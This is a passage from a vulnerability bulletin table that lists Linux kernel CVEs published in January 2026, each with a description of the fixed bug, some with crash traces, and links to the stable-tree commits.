https://git.kernel.org/stable/c/ebecca5b093895da801b3eba1a55b4ec4027d196 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix reference count leak in bpf_prog_test_run_xdp() syzbot is reporting unregister_netdevice: waiting for sit0 to become free. Usage count = 2 problem. A debug printk() patch found that a refcount is obtained at xdp_convert_md_to_buff() from bpf_prog_test_run_xdp(). According to commit ec94670fcb3b ("bpf: Support specifying ingress via xdp_md context in BPF_PROG_TEST_RUN"), the refcount obtained by xdp_convert_md_to_buff() will be released by xdp_convert_buff_to_md(). Therefore, we can consider that the error handling path introduced by commit 1c1949982524 ("bpf: introduce frags support to bpf_prog_test_run_xdp()") forgot to call xdp_convert_buff_to_md(). | 2026-01-23 | not yet calculated | CVE-2026-22994 | https://git.kernel.org/stable/c/368569bc546d3368ee9980ba79fc42fdff9a3365 https://git.kernel.org/stable/c/98676ee71fd4eafeb8be63c7f3f1905d40e03101 https://git.kernel.org/stable/c/fb9ef40cccdbacce36029b305d0ef1e12e4fea38 https://git.kernel.org/stable/c/737be05a765761d7d7c9f7fe92274bd8e6f6951e https://git.kernel.org/stable/c/ec69daabe45256f98ac86c651b8ad1b2574489a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: fix use-after-free in ublk_partition_scan_work A race condition exists between the async partition scan work and device teardown that can lead to a use-after-free of ub->ub_disk: 1. ublk_ctrl_start_dev() schedules partition_scan_work after add_disk() 2. ublk_stop_dev() calls ublk_stop_dev_unlocked() which does: - del_gendisk(ub->ub_disk) - ublk_detach_disk() sets ub->ub_disk = NULL - put_disk() which may free the disk 3. The worker ublk_partition_scan_work() then dereferences ub->ub_disk leading to UAF Fix this by using ublk_get_disk()/ublk_put_disk() in the worker to hold a reference to the disk during the partition scan. The spinlock in ublk_get_disk() synchronizes with ublk_detach_disk() ensuring the worker either gets a valid reference or sees NULL and exits early. Also change flush_work() to cancel_work_sync() to avoid running the partition scan work unnecessarily when the disk is already detached. | 2026-01-23 | not yet calculated | CVE-2026-22995 | https://git.kernel.org/stable/c/72e28774e9644c2bdbb4920842fbf77103a15a85 https://git.kernel.org/stable/c/f0d385f6689f37a2828c686fb279121df006b4cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv mlx5e_priv is an unstable structure that can be memset(0) if profile attaching fails, mlx5e_priv in mlx5e_dev devlink private is used to reference the netdev and mdev associated with that struct. Instead, store netdev directly into mlx5e_dev and get mdev from the containing mlx5_adev aux device structure. This fixes a kernel oops in mlx5e_remove when switchdev mode fails due to change profile failure. $ devlink dev eswitch set pci/0000:00:03.0 mode switchdev Error: mlx5_core: Failed setting eswitch to offloads. dmesg: workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12 workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12 $ devlink dev reload pci/0000:00:03.0 ==> oops BUG: kernel NULL pointer dereference, address: 0000000000000520 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:mlx5e_remove+0x68/0x130 RSP: 0018:ffffc900034838f0 EFLAGS: 00010246 RAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45 RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000 RBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10 R10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0 R13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400 FS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0 Call Trace: <TASK> device_release_driver_internal+0x19c/0x200 bus_remove_device+0xc6/0x130 device_del+0x160/0x3d0 ? devl_param_driverinit_value_get+0x2d/0x90 mlx5_detach_device+0x89/0xe0 mlx5_unload_one_devl_locked+0x3a/0x70 mlx5_devlink_reload_down+0xc8/0x220 devlink_reload+0x7d/0x260 devlink_nl_reload_doit+0x45b/0x5a0 genl_family_rcv_msg_doit+0xe8/0x140 | 2026-01-25 | not yet calculated | CVE-2026-22996 | https://git.kernel.org/stable/c/dcb2ad755a16cb0ecd2dc98234d71a6e216ae7fe https://git.kernel.org/stable/c/a3d4f87d41f5140f1cf5c02fce5cdad2637f6244 https://git.kernel.org/stable/c/123eda2e5b1638e298e3a66bb1e64a8da92de5e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts Since j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is called only when the timer is enabled, we need to call j1939_session_deactivate_activate_next() if we cancelled the timer. Otherwise, refcount for j1939_session leaks, which will later appear as | unregister_netdevice: waiting for vcan0 to become free. Usage count = 2. problem. | 2026-01-25 | not yet calculated | CVE-2026-22997 | https://git.kernel.org/stable/c/cb2a610867bc379988bae0bb4b8bbc59c0decf1a https://git.kernel.org/stable/c/6121b7564c725b632ffe4764abe85aa239d37703 https://git.kernel.org/stable/c/1809c82aa073a11b7d335ae932d81ce51a588a4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec Commit efa56305908b ("nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length") added ttag bounds checking and data_offset validation in nvmet_tcp_handle_h2c_data_pdu(), but it did not validate whether the command's data structures (cmd->req.sg and cmd->iov) have been properly initialized before processing H2C_DATA PDUs. The nvmet_tcp_build_pdu_iovec() function dereferences these pointers without NULL checks. This can be triggered by sending H2C_DATA PDU immediately after the ICREQ/ICRESP handshake, before sending a CONNECT command or NVMe write command. Attack vectors that trigger NULL pointer dereferences: 1. H2C_DATA PDU sent before CONNECT → both pointers NULL 2. H2C_DATA PDU for READ command → cmd->req.sg allocated, cmd->iov NULL 3. H2C_DATA PDU for uninitialized command slot → both pointers NULL The fix validates both cmd->req.sg and cmd->iov before calling nvmet_tcp_build_pdu_iovec(). Both checks are required because: - Uninitialized commands: both NULL - READ commands: cmd->req.sg allocated, cmd->iov NULL - WRITE commands: both allocated | 2026-01-25 | not yet calculated | CVE-2026-22998 | https://git.kernel.org/stable/c/3def5243150716be86599c2a1767c29c68838b6d https://git.kernel.org/stable/c/374b095e265fa27465f34780e0eb162ff1bef913 https://git.kernel.org/stable/c/32b63acd78f577b332d976aa06b56e70d054cbba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: do not free existing class in qfq_change_class() Fixes qfq_change_class() error case. cl->qdisc and cl should only be freed if a new class and qdisc were allocated, or we risk various UAF. | 2026-01-25 | not yet calculated | CVE-2026-22999 | https://git.kernel.org/stable/c/362e269bb03f7076ba9990e518aeddb898232e50 https://git.kernel.org/stable/c/e9d8f11652fa08c647bf7bba7dd8163241a332cd https://git.kernel.org/stable/c/3879cffd9d07aa0377c4b8835c4f64b4fb24ac78 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix crash on profile change rollback failure mlx5e_netdev_change_profile can fail to attach a new profile and can fail to rollback to old profile, in such case, we could end up with a dangling netdev with a fully reset netdev_priv. A retry to change profile, e.g. another attempt to call mlx5e_netdev_change_profile via switchdev mode change, will crash trying to access the now NULL priv->mdev. This fix allows mlx5e_netdev_change_profile() to handle previous failures and an empty priv, by not assuming priv is valid. Pass netdev and mdev to all flows requiring mlx5e_netdev_change_profile() and avoid passing priv. In mlx5e_netdev_change_profile() check if current priv is valid, and if not, just attach the new profile without trying to access the old one. This fixes the following oops, when enabling switchdev mode for the 2nd time after first time failure: ## Enabling switchdev mode first time: mlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12 workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12 ^^^^^^^^ mlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0) ## retry: Enabling switchdev mode 2nd time: mlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload BUG: kernel NULL pointer dereference, address: 0000000000000038 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:mlx5e_detach_netdev+0x3c/0x90 Code: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 <48> 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07 RSP: 0018:ffffc90000673890 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000 RDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000 RBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000 R10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000 R13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000 FS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0 Call Trace: <TASK> mlx5e_netdev_change_profile+0x45/0xb0 mlx5e_vport_rep_load+0x27b/0x2d0 mlx5_esw_offloads_rep_load+0x72/0xf0 esw_offloads_enable+0x5d0/0x970 mlx5_eswitch_enable_locked+0x349/0x430 ? is_mp_supported+0x57/0xb0 mlx5_devlink_eswitch_mode_set+0x26b/0x430 devlink_nl_eswitch_set_doit+0x6f/0xf0 genl_family_rcv_msg_doit+0xe8/0x140 genl_rcv_msg+0x18b/0x290 ? __pfx_devlink_nl_pre_doit+0x10/0x10 ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10 ? __pfx_devlink_nl_post_doit+0x10/0x10 ? __pfx_genl_rcv_msg+0x10/0x10 netlink_rcv_skb+0x52/0x100 genl_rcv+0x28/0x40 netlink_unicast+0x282/0x3e0 ? __alloc_skb+0xd6/0x190 netlink_sendmsg+0x1f7/0x430 __sys_sendto+0x213/0x220 ? __sys_recvmsg+0x6a/0xd0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x50/0x1f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7fdfb8495047 | 2026-01-25 | not yet calculated | CVE-2026-23000 | https://git.kernel.org/stable/c/dad52950b409d6923880d65a4cddb383286e17d2 https://git.kernel.org/stable/c/e05b8084a20f6bd5827d338c928e5e0fcbafa496 https://git.kernel.org/stable/c/4dadc4077e3f77d6d31e199a925fc7a705e7adeb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: macvlan: fix possible UAF in macvlan_forward_source() Add RCU protection on (struct macvlan_source_entry)->vlan. Whenever macvlan_hash_del_source() is called, we must clear entry->vlan pointer before RCU grace period starts. This allows macvlan_forward_source() to skip over entries queued for freeing. Note that macvlan_dev are already RCU protected, as they are embedded in a standard netdev (netdev_priv(ndev)). https: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u | 2026-01-25 | not yet calculated | CVE-2026-23001 | https://git.kernel.org/stable/c/8518712a2ca952d6da2238c6f0a16b4ae5ea3f13 https://git.kernel.org/stable/c/6dbead9c7677186f22b7981dd085a0feec1f038e https://git.kernel.org/stable/c/7470a7a63dc162f07c26dbf960e41ee1e248d80e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/buildid: use __kernel_read() for sleepable context Prevent a "BUG: unable to handle kernel NULL pointer dereference in filemap_read_folio". For the sleepable context, convert freader to use __kernel_read() instead of direct page cache access via read_cache_folio(). This simplifies the faultable code path by using the standard kernel file reading interface which handles all the complexity of reading file data. At the moment we are not changing the code for non-sleepable context which uses filemap_get_folio() and only succeeds if the target folios are already in memory and up-to-date. The reason is to keep the patch simple and easier to backport to stable kernels. Syzbot repro does not crash the kernel anymore and the selftests run successfully. In the follow up we will make __kernel_read() with IOCB_NOWAIT work for non-sleepable contexts. In addition, I would like to replace the secretmem check with a more generic approach and will add fstest for the buildid code. | 2026-01-25 | not yet calculated | CVE-2026-23002 | https://git.kernel.org/stable/c/b11dfb7708f212b96c7973a474014c071aa02e05 https://git.kernel.org/stable/c/568aeb3476c770a3863c755dd2a199c212434286 https://git.kernel.org/stable/c/777a8560fd29738350c5094d4166fe5499452409 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: use skb_vlan_inet_prepare() in __ip6_tnl_rcv() Blamed commit did not take care of VLAN encapsulations as spotted by syzbot [1]. Use skb_vlan_inet_prepare() instead of pskb_inet_may_pull(). [1] BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321 __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321 ip6ip6_dscp_ecn_decapsulate+0x16f/0x1b0 net/ipv6/ip6_tunnel.c:729 __ip6_tnl_rcv+0xed9/0x1b50 net/ipv6/ip6_tunnel.c:860 ip6_tnl_rcv+0xc3/0x100 net/ipv6/ip6_tunnel.c:903 gre_rcv+0x1529/0x1b90 net/ipv6/ip6_gre.c:-1 ip6_protocol_deliver_rcu+0x1c89/0x2c60 net/ipv6/ip6_input.c:438 ip6_input_finish+0x1f4/0x4a0 net/ipv6/ip6_input.c:489 NF_HOOK include/linux/netfilter.h:318 [inline] ip6_input+0x9c/0x330 net/ipv6/ip6_input.c:500 ip6_mc_input+0x7ca/0xc10 net/ipv6/ip6_input.c:590 dst_input include/net/dst.h:474 [inline] ip6_rcv_finish+0x958/0x990 net/ipv6/ip6_input.c:79 NF_HOOK include/linux/netfilter.h:318 [inline] ipv6_rcv+0xf1/0x3c0 net/ipv6/ip6_input.c:311 __netif_receive_skb_one_core net/core/dev.c:6139 [inline] __netif_receive_skb+0x1df/0xac0 net/core/dev.c:6252 netif_receive_skb_internal net/core/dev.c:6338 [inline] netif_receive_skb+0x57/0x630 net/core/dev.c:6397 tun_rx_batched+0x1df/0x980 drivers/net/tun.c:1485 tun_get_user+0x5c0e/0x6c60 drivers/net/tun.c:1953 tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0xbe2/0x15d0 fs/read_write.c:686 ksys_write fs/read_write.c:738 [inline] __do_sys_write fs/read_write.c:749 [inline] __se_sys_write fs/read_write.c:746 [inline] __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746 x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:4960 [inline] slab_alloc_node mm/slub.c:5263 [inline] kmem_cache_alloc_node_noprof+0x9e7/0x17a0 mm/slub.c:5315 kmalloc_reserve+0x13c/0x4b0 net/core/skbuff.c:586 __alloc_skb+0x805/0x1040 net/core/skbuff.c:690 alloc_skb include/linux/skbuff.h:1383 [inline] alloc_skb_with_frags+0xc5/0xa60 net/core/skbuff.c:6712 sock_alloc_send_pskb+0xacc/0xc60 net/core/sock.c:2995 tun_alloc_skb drivers/net/tun.c:1461 [inline] tun_get_user+0x1142/0x6c60 drivers/net/tun.c:1794 tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0xbe2/0x15d0 fs/read_write.c:686 ksys_write fs/read_write.c:738 [inline] __do_sys_write fs/read_write.c:749 [inline] __se_sys_write fs/read_write.c:746 [inline] __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746 x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f CPU: 0 UID: 0 PID: 6465 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(none) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 | 2026-01-25 | not yet calculated | CVE-2026-23003 | https://git.kernel.org/stable/c/df5ffde9669314500809bc498ae73d6d3d9519ac https://git.kernel.org/stable/c/b9f915340f25cae1562f18e1eb52deafca328414 https://git.kernel.org/stable/c/81c734dae203757fb3c9eee6f9896386940776bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() syzbot was able to crash the kernel in rt6_uncached_list_flush_dev() in an interesting way [1] Crash happens in list_del_init()/INIT_LIST_HEAD() while writing list->prev, while the prior write on list->next went well. static inline void INIT_LIST_HEAD(struct list_head *list) { WRITE_ONCE(list->next, list); // This went well WRITE_ONCE(list->prev, list); // Crash, @list has been freed. } Issue here is that rt6_uncached_list_del() did not attempt to lock ul->lock, as list_empty(&rt->dst.rt_uncached) returned true because the WRITE_ONCE(list->next, list) happened on the other CPU. We might use list_del_init_careful() and list_empty_careful(), or make sure rt6_uncached_list_del() always grabs the spinlock whenever rt->dst.rt_uncached_list has been set. A similar fix is neeed for IPv4. [1] BUG: KASAN: slab-use-after-free in INIT_LIST_HEAD include/linux/list.h:46 [inline] BUG: KASAN: slab-use-after-free in list_del_init include/linux/list.h:296 [inline] BUG: KASAN: slab-use-after-free in rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline] BUG: KASAN: slab-use-after-free in rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020 Write of size 8 at addr ffff8880294cfa78 by task kworker/u8:14/3450 CPU: 0 UID: 0 PID: 3450 Comm: kworker/u8:14 Tainted: G L syzkaller #0 PREEMPT_{RT,(full)} Tainted: [L]=SOFTLOCKUP Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: netns cleanup_net Call Trace: <TASK> dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 INIT_LIST_HEAD include/linux/list.h:46 [inline] list_del_init include/linux/list.h:296 [inline] rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline] rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020 addrconf_ifdown+0x143/0x18a0 net/ipv6/addrconf.c:3853 addrconf_notify+0x1bc/0x1050 net/ipv6/addrconf.c:-1 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_extack net/core/dev.c:2268 [inline] call_netdevice_notifiers net/core/dev.c:2282 [inline] netif_close_many+0x29c/0x410 net/core/dev.c:1785 unregister_netdevice_many_notify+0xb50/0x2330 net/core/dev.c:12353 ops_exit_rtnl_list net/core/net_namespace.c:187 [inline] ops_undo_list+0x3dc/0x990 net/core/net_namespace.c:248 cleanup_net+0x4de/0x7b0 net/core/net_namespace.c:696 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> Allocated by task 803: kasan_save_stack mm/kasan/common.c:57 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:78 unpoison_slab_object mm/kasan/common.c:340 [inline] __kasan_slab_alloc+0x6c/0x80 mm/kasan/common.c:366 kasan_slab_alloc include/linux/kasan.h:253 [inline] slab_post_alloc_hook mm/slub.c:4953 [inline] slab_alloc_node mm/slub.c:5263 [inline] kmem_cache_alloc_noprof+0x18d/0x6c0 mm/slub.c:5270 dst_alloc+0x105/0x170 net/core/dst.c:89 ip6_dst_alloc net/ipv6/route.c:342 [inline] icmp6_dst_alloc+0x75/0x460 net/ipv6/route.c:3333 mld_sendpack+0x683/0xe60 net/ipv6/mcast.c:1844 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entr ---truncated--- | 2026-01-25 | not yet calculated | CVE-2026-23004 | https://git.kernel.org/stable/c/722de945216144af7cd4d39bdeb936108d2595a7 https://git.kernel.org/stable/c/9a6f0c4d5796ab89b5a28a890ce542344d58bd69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1 When loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in response to a guest WRMSR, clear XFD-disabled features in the saved (or to be restored) XSTATE_BV to ensure KVM doesn't attempt to load state for features that are disabled via the guest's XFD. Because the kernel executes XRSTOR with the guest's XFD, saving XSTATE_BV[i]=1 with XFD[i]=1 will cause XRSTOR to #NM and panic the kernel. E.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV: ------------[ cut here ]------------ WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848 Modules linked in: kvm_intel kvm irqbypass CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:exc_device_not_available+0x101/0x110 Call Trace: <TASK> asm_exc_device_not_available+0x1a/0x20 RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90 switch_fpu_return+0x4a/0xb0 kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm] kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x62/0x940 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> ---[ end trace 0000000000000000 ]--- This can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1, and a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler's call to fpu_update_guest_xfd(). and if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE: ------------[ cut here ]------------ WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867 Modules linked in: kvm_intel kvm irqbypass CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:exc_device_not_available+0x101/0x110 Call Trace: <TASK> asm_exc_device_not_available+0x1a/0x20 RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90 fpu_swap_kvm_fpstate+0x6b/0x120 kvm_load_guest_fpu+0x30/0x80 [kvm] kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm] kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x62/0x940 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> ---[ end trace 0000000000000000 ]--- The new behavior is consistent with the AMX architecture. Per Intel's SDM, XSAVE saves XSTATE_BV as '0' for components that are disabled via XFD (and non-compacted XSAVE saves the initial configuration of the state component): If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i, the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1; instead, it operates as if XINUSE[i] = 0 (and the state component was in its initial state): it saves bit i of XSTATE_BV field of the XSAVE header as 0; in addition, XSAVE saves the initial configuration of the state component (the other instructions do not save state component i). Alternatively, KVM could always do XRSTOR with XFD=0, e.g. by using a constant XFD based on the set of enabled features when XSAVEing for a struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled features can only happen in the above interrupt case, or in similar scenarios involving preemption on preemptible kernels, because fpu_swap_kvm_fpstate()'s call to save_fpregs_to_fpstate() saves the outgoing FPU state with the current XFD; and that is (on all but the first WRMSR to XFD) the guest XFD. Therefore, XFD can only go out of sync with XSTATE_BV in the above interrupt case, or in similar scenarios involving preemption on preemptible kernels, and it we can consider it (de facto) part of KVM ABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features. [Move clea ---truncated--- | 2026-01-25 | not yet calculated | CVE-2026-23005 | https://git.kernel.org/stable/c/f577508cc8a0adb8b4ebe9480bba7683b6149930 https://git.kernel.org/stable/c/eea6f395ca502c4528314c8112da9b5d65f685eb https://git.kernel.org/stable/c/b45f721775947a84996deb5c661602254ce25ce6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: tlv320adcx140: fix null pointer The "snd_soc_component" in "adcx140_priv" was only used once but never set. It was only used for reaching "dev" which is already present in "adcx140_priv". | 2026-01-25 | not yet calculated | CVE-2026-23006 | https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929 https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: zero non-PI portion of auto integrity buffer The auto-generated integrity buffer for writes needs to be fully initialized before being passed to the underlying block device, otherwise the uninitialized memory can be read back by userspace or anyone with physical access to the storage device. If protection information is generated, that portion of the integrity buffer is already initialized. The integrity data is also zeroed if PI generation is disabled via sysfs or the PI tuple size is 0. However, this misses the case where PI is generated and the PI tuple size is nonzero, but the metadata size is larger than the PI tuple. In this case, the remainder ("opaque") of the metadata is left uninitialized. Generalize the BLK_INTEGRITY_CSUM_NONE check to cover any case when the metadata is larger than just the PI tuple. | 2026-01-25 | not yet calculated | CVE-2026-23007 | https://git.kernel.org/stable/c/d6072557b90e0c557df319a56f4a9dc482706d2c https://git.kernel.org/stable/c/ca22c566b89164f6e670af56ecc45f47ef3df819 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Fix KMS with 3D on HW version 10 HW version 10 does not have GB Surfaces so there is no backing buffer for surface backed FBs. This would result in a nullptr dereference and crash the driver causing a black screen. | 2026-01-25 | not yet calculated | CVE-2026-23008 | https://git.kernel.org/stable/c/a91bdd21d5efb3072beefbec13762b7722200c49 https://git.kernel.org/stable/c/d9186faeae6efb7d0841a5e8eb213ff4c7966614 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xhci: sideband: don't dereference freed ring when removing sideband endpoint xhci_sideband_remove_endpoint() incorrecly assumes that the endpoint is running and has a valid transfer ring. Lianqin reported a crash during suspend/wake-up stress testing, and found the cause to be dereferencing a non-existing transfer ring 'ep->ring' during xhci_sideband_remove_endpoint(). The endpoint and its ring may be in unknown state if this function is called after xHCI was reinitialized in resume (lost power), or if device is being re-enumerated, disconnected or endpoint already dropped. Fix this by both removing unnecessary ring access, and by checking ep->ring exists before dereferencing it. Also make sure endpoint is running before attempting to stop it. Remove the xhci_initialize_ring_info() call during sideband endpoint removal as is it only initializes ring structure enqueue, dequeue and cycle state values to their starting values without changing actual hardware enqueue, dequeue and cycle state. Leaving them out of sync is worse than leaving it as it is. The endpoint will get freed in after this in most usecases. If the (audio) class driver want's to reuse the endpoint after 